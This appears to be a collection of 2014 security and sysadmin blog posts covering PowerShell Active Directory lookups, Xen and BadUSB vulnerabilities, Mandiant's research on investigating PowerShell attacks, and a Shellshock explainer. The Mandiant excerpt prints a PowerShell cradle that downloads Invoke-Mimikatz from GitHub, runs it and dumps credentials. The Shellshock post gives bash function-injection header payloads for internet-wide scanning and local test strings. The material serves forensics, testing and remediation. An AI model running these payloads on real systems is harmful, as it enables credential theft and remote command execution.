Oct 10 2014

PowerShell and Ambiguous Name Resolution (ANR) Search in Active Directory

I was recently asked how to find a user when you have data that may be the SamAccountName or in another attribute. My first thought was leveraging Ambiguous Name Resolution (ANR) Search in Active Directory.

ANR enables you to find a user when you have some information about a user, but don’t know exactly to which attribute that data corresponds. For example, if you know the user has “Thor” somewhere, but don’t know exactly what the SAMAccountName is (or DN, SID, name, etc).  Submitting an ANR search will query the AD attributes flagged for ANR (attributes must be indexed) and replies with the results (may be more than one user found).

Windows Server 2008 checks the following attributes for ANR queries:

  • displayName
  • givenName
  • legacyExchangeDN
  • msDS-AdditionalSamAccountName
  • msDS-PhoneticCompanyName
  • msDS-PhoneticDepartment
  • msDS-PhoneticDisplayName
  • msDS-PhoneticFirstName
  • msDS-PhoneticLastName
  • physicalDeliveryOfficeName
  • proxyAddresses
  • Name
  • sAMAccountName
  • sn

Since ANR is an LDAP-specific feature with AD, you have to use a LDAP filter to get it.

Using the Microsoft AD cmdlets included in Windows Server 2008 R2, Get-ADObject performs an ANR search.
For Example:

Import-Module ActiveDirectory
Get-ADObject -LDAPFilter { (&(ObjectClass=User)(ANR=Thor) ) }

The Quest AD cmdlets support ANR natively (of course they do!).

Reference Articles:

Oct 07 2014

PowerShell Code: Find User in Active Directory Forest

 

PowerShell Code: Find User in Active Directory Forest

There are times when you have a userid, but don’t know where in a multi-domain forest a user is located. Here’s some PowerShell code for locating the user’s domain.
PowerShell code leverages the Active Directory PowerShell module to query a local Global Catalog (GC) server in order to identify the user’s domain.


Param
(
$UserID
)

import-module activedirectory

$LocalSite = (Get-ADDomainController -Discover).Site
$NewTargetGC = Get-ADDomainController -Discover -Service 6 -SiteName $LocalSite
IF (!$NewTargetGC)
{ $NewTargetGC = Get-ADDomainController -Discover -Service 6 -NextClosestSite }
$NewTargetGCHostName = $NewTargetGC.HostName
$LocalGC = “$NewTargetGCHostName” + “:3268”

Write-Output “Identify User and Computer Objects with configured Service Principal Names `r ”
Get-ADUser $UserID -Server “$LocalGC”

Get-ADUser -Server $LocalGC -filter { sAMAccountName -eq $UserID }

Oct 06 2014

Comparing ASLR on Windows & Linux

Two key differences regarding Linux & Windows Address Space Layout Randomization (ASLR):

  1. ASLR is not as prevalent in most Linux distributions as it is on modern Windows systems.
  2. ASLR cannot be force-enabled for applications on Linux, as EMET can do on Windows.

Read the entire article at Cert.org

Oct 04 2014

US-Based Azure VMs With Static IP May Get Foreign IP Addresses

Interesting side-effect of the enormity of the infrastructure behind a public cloud service.

Some Azure customers may have noticed that for a VM deployed in a US region, when they launch a localized page on a web browser it may redirect them to an international site. The following explains why this may be happening.

Potential Cause

IPv4 address space has been fully assigned in the United States, meaning there is no additional IPv4 address space available. This requires Microsoft to use the IPv4 address space available to us globally for the addressing of new services. The result is that we will have to use IPv4 address space assigned to a non-US region to address services which may be in a US region.  It is not possible to transfer registration because the IP space is allocated to the registration authorities by Internet Assigned Numbers Authority.

At times your service may appear to be hosted in a non-US location.

Service and Data are located where deployed

It is important to note that the IP address registration authority does not equate to IP address physical location (i.e., you can have an IP address registered in Brazil but allocated to a device or service physically located in Virginia).  Thus when you deploy to a U.S. region, your service is still hosted in U.S. and your customer data will remain in the U.S. as detailed in our Trust Center:  http://www.windowsazure.com/en-us/support/trust-center/privacy/

We are currently working with a few major IP geo-location database companies to update the location of these IPs which should help alleviate the issues this may be causing.

Source: Microsoft Azure Blog

 

Given that Microsoft hasn’t really made much progress in moving their cloud to support ipv6, now may be the time.

Does Azure support IPv6?

 

 

Oct 03 2014

XEN Hypervisor Vulnerabilities

And you were wondering why Amazon had rolling reboots of EC2 recently…

From the Whitepaper “FROM RING 3 TO RING0: EXPLOITING THE XEN X86 INSTRUCTION EMULATOR” (bitdefender):

ABSTRACT

While a VMM can provide a considerable level of security by isolation, it is generally true that by increasing the code-base that runs on a given host system one also increases the attack surface. Instruction emulators are a critical part of any hypervisor, as they provide the means to virtualize certain devices or handle certain types of faults (such as EPT violations or Invalid Opcode Exceptions). However, creating an emulator is not an easy task, and as with any other piece of software, any issue in the emulation of an instruction might be exploited by an attacker in various ways. If, for example, the emulator fails to properly validate an instruction as precisely as a physical CPU does, an attacker might leverage this in order to gain elevated privileges or cause denial of service. This is an important issue especially, since such problems can be successfully exploited on virtually any x86 operating system. The Xen hypervisor has several vulnerabilities involving the x86 emulator, due to the lack of validation of privilege, which enables the emulation of several sensitive instructions from ring-3: LMSW, HLT, INT, LIDT, LGDT. Some of them have a minor effect (LMSW, HLT), others can cause denial of service (INT) and some facilitate escalation of privileges (LIDT, LGDT) by leading to arbitrary code execution in ring-0. Additionally, a method to bypass Intel SMEP is presented, in the context of the discovered vulnerabilities.

INTRODUCTION

Vulnerabilities in VMMs (Virtual Machine Monitors) are not something new. Hyper-V, Xen or VMware all had vulnerabilities at some point (and they probably still do – they’re yet to be discovered). Xen Security Advisory (Xen Security Advisory, n.d.) and VMware Security Advisories (VMware, n.d.) contain a complete list of vulnerabilities identified either directly in the VMM or in other components, while a good example for Hyper-V is MS13-092 (Luft, n.d.). Some vulnerabilities may be used to cause a denial of service, while others can be used to gain elevated privileges. In this whitepaper we will describe two vulnerabilities identified in the Xen hypervisor, which allow for denial of service and elevation of privileges inside the guest. In addition, a method to bypass SMEP in the context of the presented vulnerabilities is disclosed.

XEN X86 INSTRUCTION EMULATOR VULNERABILITIES

Two distinct vulnerabilities have been discovered in the Xen x86 instruction emulator, which also affect other platforms based on it, such as XenServer (tested on XenServer 6.2, build date 2013-10-15, build number 75966c), XenClient (tested on XenClient 5.1.3), XenClient XT (tested on XenClient XT 3.2.2 Trial, build 132629), Amazon and perhaps (although not tested) Oracle VM and others. Versions from at least 3.2.x onwards are vulnerable (older versions have not been tested) to:

  • Logic errors in software interrupt (INT instruction) handling (XSA-106, CVE-2014-7156)
  • Insufficient privilege-validations for HLT, LMSW, LIDT, LGDT instructions (XSA-105, CVE-2014-7155)

 

 

References:

  • Amazon Blog: EC2 Maintenance Update
  • Ars Technica: Security bug in Xen may have exposed Amazon, other cloud services
  • eWeek: Rackspace Joined Amazon in Patching, Rebooting Cloud Servers
  • Information Week: Amazon Reboots Cloud Servers, Xen Bug Blamed

 

Oct 02 2014

BadUSB Overview (Presentation & Slides) & Recent Release of BadUSB Exploit Code

BadUSB – The problems with USB

One of the best talks I saw at BlackHat USA 2014 was on security issues with USB that are built into the spec (i.e. can’t be changed easily).

Here are the primary reasons why USB is vulnerable (and easily exploited):

  • The firmware code of the USB device is easily updated (flashed) without any kind of authentication (or signing)
  • USB devices can change USB Class type at will from a USB hard drive to keyboard to network card.
  • USB device serial numbers are not required to be unique and typically aren’t and the device can say its SN is whatever it wants it to be.

From the security researcher website:

“BadUSB – Turning devices evil. Once reprogrammed, benign devices can turn malicious in many ways, including:

  1. A device can emulate a keyboard and issue commands on behalf of the logged-in user, for example to exfiltrate files or install malware. Such malware, in turn, can infect the controller chips of other USB devices connected to the computer.
  2. The device can also spoof a network card and change the computer’s DNS setting to redirect traffic.
  3. A modified thumb drive or external hard disk can – when it detects that the computer is starting up – boot a small virus, which infects the computer’s operating system prior to boot.”

Microsoft recognizes this is a big issue as well:

Enterprise security software needs to start investing in protecting computers from USB peripherals. A software solution may be able to resist a USB peripheral from changing device types, for example, or detect sequences of keystrokes deemed malicious or too quick to be human-controlled.

Similarly, hardware security USB hubs may be built to enforce device types on USB ports and prevent firmware rewriting – analogous to a traditional network firewall. The USB port that each device is plugged into could define the device types allowed by the USB peripheral. Although this defeats the design advantage of USB, it partially mitigates the risk by preventing USB peripherals from arbitrarily changing their types.

In conclusion, the enterprise security surrounding USB devices is heading towards an overhaul. The process may be painful, but it is necessary.

BadUSB Exploit Code is Released

Security researchers presented on BadUSB at DerbyCon 2014 last weekend in a talk called “Making BadUSB Work For You.”

The BadUSB exploit code is now available on GitHub.

Wired has an article describing the code release:

It’s been just two months since researcher Karsten Nohl demonstrated an attack he called BadUSB to a standing-room-only crowd at the Black Hat security conference in Las Vegas, showing that it’s possible to corrupt any USB device with insidious, undetectable malware. Given the severity of that security problem—and the lack of any easy patch—Nohl has held back on releasing the code he used to pull off the attack. But at least two of Nohl’s fellow researchers aren’t waiting any longer.

In a talk at the Derbycon hacker conference in Louisville, Kentucky last week, researchers Adam Caudill and Brandon Wilson showed that they’ve reverse engineered the same USB firmware as Nohl’s SR Labs, reproducing some of Nohl’s BadUSB tricks. And unlike Nohl, the hacker pair has also published the code for those attacks on Github, raising the stakes for USB makers to either fix the problem or leave hundreds of millions of users vulnerable.

“The belief we have is that all of this should be public. It shouldn’t be held back. So we’re releasing everything we’ve got,” Caudill told the Derbycon audience on Friday. “This was largely inspired by the fact that [SR Labs] didn’t release their material. If you’re going to prove that there’s a flaw, you need to release the material so people can defend against it.”

Note that IronKey claims their USB drives are not vulnerable to the BadUSB exploits.

IronKey Secure USB devices are not vulnerable to BadUSB malware which was revealed at Black Hat on August 7. BadUSB is the first USB malware designed to attack the device itself instead of attacking the data on the device. IronKey’s leadership in security, including its use of digital signatures in all controller firmware, makes its products immune to this new threat. To help reduce the impact of BadUSB, the company is offering a GoodUSB Trade-Up Program that provides discounts on its secure USB products.
As revealed at the Black Hat session on BadUSB, the attack changes the firmware that controls the behavior of the USB hardware, allowing the USB device to become a host that can subsequently infect other computers and USB devices. The modified controller firmware cannot be detected by today’s anti-malware solutions, and in many cases, may remain undetectable.
As explained by the researchers, the best protection against this vulnerability is to use code signing for firmware updates. If the signed firmware is modified, the device cannot authenticate the firmware and simply will not operate. This prevents the infection from spreading but results in an unusable device. That is why in addition to using signed firmware, IronKey protects the mechanism used to update the firmware with hardware-based security keys. This prevents tampering with the signed firmware, which would leave the device unusable.

 

References:

Oct 02 2014

Using PowerShell to Perform a Reverse DNS Lookup in Active Directory

Typically, one would use ping -a to get the hostname for a specific IP address which performs a DNS reverse lookup.
Querying AD for a computer with an IP works great for computers joined to the Active Directory domain since most computers in AD have the IP Address configured on the computer account. When the computer is joined to the domain, there are several attributes populated which are updated periodically, such as ipv4address, operatingsystem, operatingsystemversion, servicepack, etc.

Perform a IP Lookup Using PowerShell to find the associated computer (AD cmdlets):
import-module activedirectory
$ComputerIPAddress = ‘10.10.10.10’
Get-ADComputer -property * -filter { ipv4address -eq $ComputerIPAddress }


Perform a DNS Reverse Lookup (IP to hostname) Using PowerShell (.Net):
$ComputerIPAddress = ‘10.10.10.10’
[System.Net.Dns]::GetHostEntry($ComputerIPAddress).HostName

Get IP from Hostname Using PowerShell (.Net):
$ComputerName= ‘MetcorpDC01’
[System.Net.Dns]::GetHostAddresses(“$ComputerName”).IPAddressToString

 

Oct 01 2014

Program like a Monkey – I mean an Orangutan – It’s OOK!

Learning PowerShell & Python isn’t enough… I need to learn OOK!

Introduction

Ook! is a programming language designed for orang-utans. Ook! is essentially isomorphic to the well-known esoteric language BrainF***, but has even fewer syntax elements.

Design Principles

  • A programming language should be writable and readable by orang-utans.
  • To this end, the syntax should be simple, easy to remember, and not mention the word “monkey”.
  • Bananas are good.

Language Concepts

If you are familiar with BrainF*** you can skip straight to the syntax elements section. Note that since Ook! is trivially isomorphic to BrainF***, it is well-established that Ook! is a Turing-complete programming language.

Memory Array and Pointer

Ook! uses a large array of integers as storage space, all initially set to zero. A Memory Pointer begins pointing at the first array cell.

Comments

Since the word “ook” can convey entire ideas, emotions, and abstract thoughts depending on the nuances of inflection, Ook! has no need of comments. The code itself serves perfectly well to describe in detail what it does and how it does it. Provided you are an orang-utan.

Syntax Elements

Ook! has only three distinct syntax elements:

  • Ook.
  • Ook?
  • Ook!

These are combined into groups of two, and the various pair combinations specify commands. Programs must thus contain an even number of “Ook”s. Line breaks are ignored.

Commands

  • Ook. Ook?
    Move the Memory Pointer to the next array cell.
  • Ook? Ook.
    Move the Memory Pointer to the previous array cell.
  • Ook. Ook.
    Increment the array cell pointed at by the Memory Pointer.
  • Ook! Ook!
    Decrement the array cell pointed at by the Memory Pointer.
  • Ook. Ook!
    Read a character from STDIN and put its ASCII value into the cell pointed at by the Memory Pointer.
  • Ook! Ook.
    Print the character with ASCII value equal to the value in the cell pointed at by the Memory Pointer.
  • Ook! Ook?
    Move to the command following the matching Ook? Ook! if the value in the cell pointed at by the Memory Pointer is zero. Note that Ook! Ook? and Ook? Ook! commands nest like pairs of parentheses, and matching pairs are defined in the same way as for parentheses.
  • Ook? Ook!
    Move to the command following the matching Ook! Ook? if the value in the cell pointed at by the Memory Pointer is non-zero.

Um, that’s it. That’s the whole language. What do you expect for something usable by orang-utans?

Ook Design & Language Specification: http://www.dangermouse.net/esoteric/ook.html

 

 

Oct 01 2014

Black Hat USA 2014 Presentation: Investigating PowerShell Attacks

Black Hat USA 2014 Presentation: Investigating PowerShell Attacks

This is an excellent presentation and I highly recommend anyone who is an admin or who is responsible for AD security.

Investigating PowerShell Attacks
Ryan Kazanciyan Technical Director, Mandiant
Matt Hastings Consultant, Mandiant

Over the past two years, we’ve seen targeted attackers increasingly utilize PowerShell to conduct command-and-control in compromised Windows environments. If your organization is running Windows 7 or Server 2008 R2, you’ve got PowerShell 2.0 installed (and on Server 2012, remoting is enabled by default!). This has created a whole new playground of attack techniques for intruders that have already popped a few admin accounts (or an entire domain). Even if you’re not legitimately using PowerShell to administer your systems, you need to be aware of how attackers can enable and abuse its features.

This presentation will focus on common attack patterns performed through PowerShell – such as lateral movement, remote command execution, reconnaissance, file transfer, etc. – and the sources of evidence they leave behind. We’ll demonstrate how to collect and interpret these forensic artifacts, both on individual hosts and at scale across the enterprise. Throughout the presentation, we’ll include examples from real-world incidents and recommendations on how to limit exposure to these attacks.

From their WhitePaper:

The authors therefore based their research on the
following assumptions:

• The attacker can obtain administrator-equivalent rights on the target system – most typically, the credentials for a privileged domain account.

• The attacker can laterally access the target system over common Windows ports and protocols (e.g. SMB, NetBIOS, and / or WinRM)

• The attacker can remotely enable PowerShell remoting and the WinRM service on a remote host by means of other native-Windows commands – such as through a scheduled task (“at” command), the service control manager (“sc” command), or Windows Management Instrumentation (WMI).

• The attacker can bypass the default “Restricted” policy under which PowerShell will execute scripts.

• The attacker, given administrator privileges, could  bypass or disable a constrained remoting endpoint configured to limit the scope of PowerShell commands available to a user. (A lower-privileged attacker might also bypass such controls – Joseph Bialek and Lee Holmes have also recently blogged on techniques to break out of constrainedrunspace, if implemented with vulnerable code, and run unauthorized commands.

 

The authors executed the following sequence of commands during testing. These commands were chosen as representative examples of how an attacker might interact with a targeted system through PowerShell. They also make use of basic cmdlets that are likely to be used even in more complex attacks.

• Single remote cmdlet execution through Invoke-Command, such as:
Invoke-Command 192.168.17.150 {Get-ChildItem c:\}

• Single remote binary execution through Invoke-Command, such as:
Invoke-Command 192.168.17.150 {c:\malware.exe}

• Remote in-memory download and execution of PowerSploit framework script Invoke-Mimikatz.ps1, such as:
Invoke-Command 192.168.17.150
{iex((New-Object Net.WebClient).
DownloadString(‘https://raw.
githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds}

• Remote interactive PowerShell command session initiated with the syntax:
Enter-PSSession 192.168.17.150

 

 

Oct 01 2014

ShellShock/BashBug – Bash Vulnerability Affects Linux, Unix, & Mac OSX

10/01/2014 Updates:

Updated (9/29/2014):

Overview
This is a “game-over” type of vulnerability due to the ubiquity of bash on *nix systems.

Fixing it involves recompiling bash or downloading a patched version from the OS vendor/provider.

It’s easy to attack and there is no authentication required when exploiting Bash via CGI scripts.
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html

“GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.”
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

“Trend Micro describes this vulnerability as “plague-like,” dwarfing Heartbleed, and hitting “approximately a half-billion Web servers and other Internet-connected devices.” Shellshock gives attackers command access to Linux- and UNIX-based systems that use Bash. Therefore, industry experts say, there are a huge number of potential attack vectors — Mac OSX devices, Android devices, OpenBSD, DHCP clients, SSH servers, web servers using CGI or Apache (including hosting servers), home routers, Bitcoin Core, and embedded systems in other Internet of Things objects like medical devices, digital cameras, and televisions.”
http://www.darkreading.com/shellshock-bash-bug-impacts-basically-everything-exploits-appear-in-wild/d/d-id/1316064?_mc=sm_dr

Vulnerable Systems & Patches:
“The vulnerability affects versions 1.14 through 4.3 of GNU Bash. Patches have been issued by many of the major Linux distribution vendors for affected versions, including:

  • Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
  • CentOS (versions 5 through 7)
  • Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
  • Debian
  • Mac OS X

Akamai is patched: https://blogs.akamai.com/2014/09/environment-bashing.html

VMWare is looking into it: http://blogs.vmware.com/security/2014/09/vmware-investigating-bash-command-injection-vulnerability-aka-shell-shock-cve-2014-6271-cve-2014-7169.html

F5 BIG-IP is not known to be vulnerable, but is patching anyway:  https://devcentral.f5.com/articles/cve-2014-6271-shellshocked

How to manually patch Apple Bash

http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851

Lots and lots of *nix systems are vulnerable: http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html

Remediation:

Remediation is obviously going to be most successful by applying patches to affected systems. Check with relevant vendors for updated information. This is also an opportunity to review systems for unused services, like FTP, Telnet, and DCHPd, and disable them when they are not required. As of writing, there is no word on a patch for OSX, but a workaround exists if one is willing to recompile Bash on vulnerable OSX systems.

Prevention capabilities will evolve as various exploits are made public or discovered in the wild. As of writing, the most critical attack vector is via Apache mod_cgi scripts, as several working exploits can be found on the web, and a Metasploit module has already been developed to exploit it. This attack vector can be mitigated with mod_security rules published by Red Hat, F5 LineRate, of course there’s an F5 BIG-IP iRule for that, and Cisco has updated signatures to detect and block attacks.

Finally, be advised that many embedded systems like SOHO routers and consumer electronics like Network Attached Storage (NAS) devices are likely vulnerable. Further, these devices could be difficult or even impossible to patch. Consumers should be on the lookout for firmware updates from manufacturers of these devices, and if NAS or router administration interfaces are connected to the Internet, they should be disconnected to avoid exploitation. These connected devices likely pose the biggest threat, as research is already underway to convert exploits into self-propagating worms.
http://www.guidepointsecurity.com/940/vulnerability-management/how-shocking-is-shellshock/

 

Checking Your Systems:

Scanning systems by sending a http header with code in it to a vulnerable system running a web server may run arbitrary code. This is bad!

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

A shellshock worm is just a matter of time…
http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html

MetaSploit has a module for finding & ultimately exploiting this bug:  https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271

Run this commands to test Bash:
$ env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”
If you see an error, you are probably safe. If you see vulnerable this is a test”, you are vulnerable.


Technical Detail:

Rapid 7 posted a video describing “How Does Bashbug (AKA shellshock) Work?  How Do I Remediate?”

“What is vulnerable?
This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied. So far, the Metasploit team has been focusing on the web-based vectors since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser’s user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash.

Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials, but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise).

There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue.

Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of a approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue.
In summary, there just isn’t enough information available to predict how many systems are potentially exploitable today.

The two most likely situations where this vulnerability will be exploited in the wild:

  • Diagnostic CGI scripts that are written in Bash or call out to system() where Bash is the default shell
  • PHP applications running in CGI mode that call out to system() and where Bash is the default shell

Bottom line: This bug is going to affect an unknowable number of products and systems, but the conditions to exploit it are fairly uncommon for remote exploitation.
Update: A DDoS bot that exploits this issue has already been found in the wild by @yinettesys
https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271

Bash supports exporting not just shell variables, but also shell functions to other bash instances, via the process environment to (indirect) child processes.  Current bash versions use an environment variable named by the function name, and a function definition starting with “() {” in the variable value to propagate function definitions through the environment.  The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function definition. 
For example, an environment variable setting of
  VAR=() { ignored; }; /bin/id
will execute /bin/id when the environment is imported into the bash process.  (The process is in a slightly undefined state at this point. The PATH variable may not have been set up yet, and bash could crash after executing /bin/id, but the damage has already happened at this point.)

The fact that an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation.

So far, HTTP requests to CGI scripts have been identified as the major attack vector.

A typical HTTP request looks like this:

GET /path?query-param-name=query-param-value HTTP/1.1
Host: www.example.com
Custom: custom-header-value

The CGI specification maps all parts to environment variables.  With Apache httpd, the magic string “() {” can appear in these places:

* Host (“www.example.com”, as REMOTE_HOST)
* Header value (“custom-header-value”, as HTTP_CUSTOM in this example)
* Server protocol (“HTTP/1.1”, as SERVER_PROTOCOL)

The user name embedded in an Authorization header could be a vector as well, but the corresponding REMOTE_USER variable is only set if the user name corresponds to a known account according to the
authentication configuration, and a configuration which accepts the magic string appears somewhat unlikely.

In addition, with other CGI implementations, the request method (“GET”), path (“/path”) and query string
(“query-param-name=query-param-value”) may be vectors, and it is conceivable for “query-param-value” as well, and perhaps even “query-param-name”.

The other vector is OpenSSH, either through AcceptEnv variables, TERM or SSH_ORIGINAL_COMMAND.

Other vectors involving different environment variable set by additional programs are expected.”
http://seclists.org/oss-sec/2014/q3/650

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consists of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc)

Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example:

  • ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
  • Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).
  • PHP scripts executed with mod_php are not affected even if they spawn subshells.
  • DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
  • Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.
  • Any other application which is hooked onto a shell or runs a shell script as using bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:

$ env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”
 vulnerable
 this is a test

The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:

 $ env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”
 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x’
 this is a test

https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Looks like the original patch is incomplete:
Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. Red Hat is working on patches in conjunction with the upstream developers as a critical priority.”
https://access.redhat.com/articles/1200223

Red Hat’s review of how this affects common configurations:

Package Description
httpd CGI scripts are likely affected by this issue: when a CGI script is run by the web server, it uses environment variables to pass data to the script. These environment variables can be controlled by the attacker. If the CGI script calls Bash, the script could execute arbitrary code as the httpd user. mod_php, mod_perl, and mod_python do not use environment variables and we believe they are not affected.
Secure Shell (SSH) It is not uncommon to restrict remote commands that a user can run via SSH, such as rsync or git. In these instances, this issue can be used to execute any command, not just the restricted command.
dhclient The Dynamic Host Configuration Protocol Client (dhclient) is used to automatically obtain network configuration information via DHCP. This client uses various environment variables and runs Bash to configure the network interface. Connecting to a malicious DHCP server could allow an attacker to run arbitrary code on the client machine.
CUPS It is believed that CUPS is affected by this issue. Various user supplied values are stored in environment variables when cups filters are executed.
sudo Commands run via sudo are not affected by this issue. Sudo specifically looks for environment variables that are also functions. It could still be possible for the running command to set an environment variable that could cause a Bash child process to execute arbitrary code.
Firefox We do not believe Firefox can be forced to set an environment variable in a manner that would allow Bash to run arbitrary commands. It is still advisable to upgrade Bash as it is common to install various plug-ins and extensions that could allow this behavior.
Postfix The Postfix server will replace various characters with a ?. While the Postfix server does call Bash in a variety of ways, we do not believe an arbitrary environment variable can be set by the server. It is however possible that a filter could set environment variables.

https://access.redhat.com/articles/1200223

 

References: